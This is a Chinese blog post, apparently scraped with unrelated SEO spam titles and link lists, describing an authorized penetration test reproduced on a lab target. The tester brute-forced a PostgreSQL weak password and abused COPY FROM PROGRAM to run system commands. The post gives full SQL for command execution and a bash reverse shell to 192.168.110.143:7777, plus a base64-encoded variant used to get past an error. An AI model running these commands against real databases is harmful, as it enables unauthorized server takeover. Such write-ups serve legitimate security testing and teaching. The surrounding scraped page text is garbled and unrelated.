当前位置: 首页 > news >正文

三栏式布局的网站有哪些系统开发的需求分析阶段的重要工作之一是

三栏式布局的网站有哪些,系统开发的需求分析阶段的重要工作之一是,如何评价小米的网站建设,电子商务网站怎么建设记一次授权攻击通过PostgreSql弱口令拿到服务器权限的事件。 使用靶机复现攻击过程。 过程 在信息收集过程中,获取到在公网服务器上开启了5432端口,尝试进行暴破,获取到数据库名为默认postgres,密码为1 随后连接进PostgreSql …

记一次授权攻击通过PostgreSql弱口令拿到服务器权限的事件。

使用靶机复现攻击过程。

过程

在信息收集过程中,获取到在公网服务器上开启了5432端口,尝试进行暴破,获取到数据库名为默认postgres,密码为1

随后连接进PostgreSql

已知从9.3版本开始,postgresql新增copy to/from program功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

利用条件:

  • 超级用户权限
  • 版本9.3-11.2

默认数据库postgres已经是超级用户权限,然后需要确认数据库版本

查看PostgreSql版本

以上两个条件均具备,说明该漏洞可以利用

执行命令,获取用户id及群组id

-- 先删除你想要使用但是已经存在的表

DROP TABLE IF EXISTS cmd_exec;

-- 创建保存系统命令输出的表

CREATE TABLE cmd_exec(cmd_output text);

-- 执行系统命令利用特定函数

COPY cmd_exec FROM PROGRAM 'id';

-- 查看执行结果

SELECT * FROM cmd_exec;

命令可以正常执行,随后执行反弹shell命令尝试获取交互shell

控制端使用nc开启监听

在数据库中执行如下命令

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM '/bin/bash -i >& /dev/tcp/192.168.110.143/7777 0>&1';

SELECT * FROM cmd_exec;

在实战中使用上述命令可以正常反弹shell,但是在靶场中执行会产生报错信息ERROR: program "/bin/bash -i >& /dev/tcp/192.168.110.143/7777 0>&1" failed

DETAIL: child process exited with exit code 2

尝试对反弹shell命令进行编码

echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTEwLjE0My83Nzc3IDA+JjEK" | base64 -d | bash

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTEwLjE0My83Nzc3IDA+JjEK" | base64 -d | bash';

SELECT * FROM cmd_exec;

执行后成功获取到shell

http://www.yayakq.cn/news/568599/

相关文章:

  • 网站tag标签功能实现微山网站建设
  • 深圳 电子商务网站开发什么是企业网站策划案
  • 小程序 企业网站漳州网站建设求职简历
  • 如何搜网站提高网站收录的方法
  • 最好网站建设公司哪家好深圳建设工程质量检测中心
  • iis网站重定向设置网站设计名称
  • 闵行网站建设公司建设网站 教学反思
  • 免费广告行业网站建设画册设计内容
  • jsp小型网站开发代码电商网站设计公司排行榜
  • 网站模板论坛wordpress侧栏小工具栏
  • 如何判断一个网站的好坏微商软件自助商城
  • 功能网站开发河南省建设安全监督站的网站
  • 网站开发技术是什么专业会的企业网站是如何做的
  • 做网站的公司面试省建设厅网站安全生产标准化
  • 北京工程建设交易中心网站沈阳网站建设dnglzx
  • 涪陵网站制作哔哩哔哩视频推广
  • 电工应用技术网站资源建设wordpress 企业汉化主题
  • 简述网站制作方案和主要内容旺道网站优化
  • 大连网站开发2345网址大全设主页访问
  • 网站建设 学校网站开发系统流程图
  • 网站建设一般需要多少钱宁波数控机械加工网
  • 网站建设推荐华网天下大理旅游网站建设
  • 苏州市城乡和建设局网站首页自助建站系统源码 资源网
  • 专注手机网站建设东莞网站建设公司哪家好
  • 网站开发有什么沈阳市建设工程信息网站
  • 公司网站建设全包线上新媒体电商怎么开店
  • 闵行建设机械网站移动端网站没有icp
  • python个人网站开发注册会计师报名条件
  • 北京海淀公司网站icp备案php建站系统源码
  • 电商网站怎么推广个人做网站备案多少钱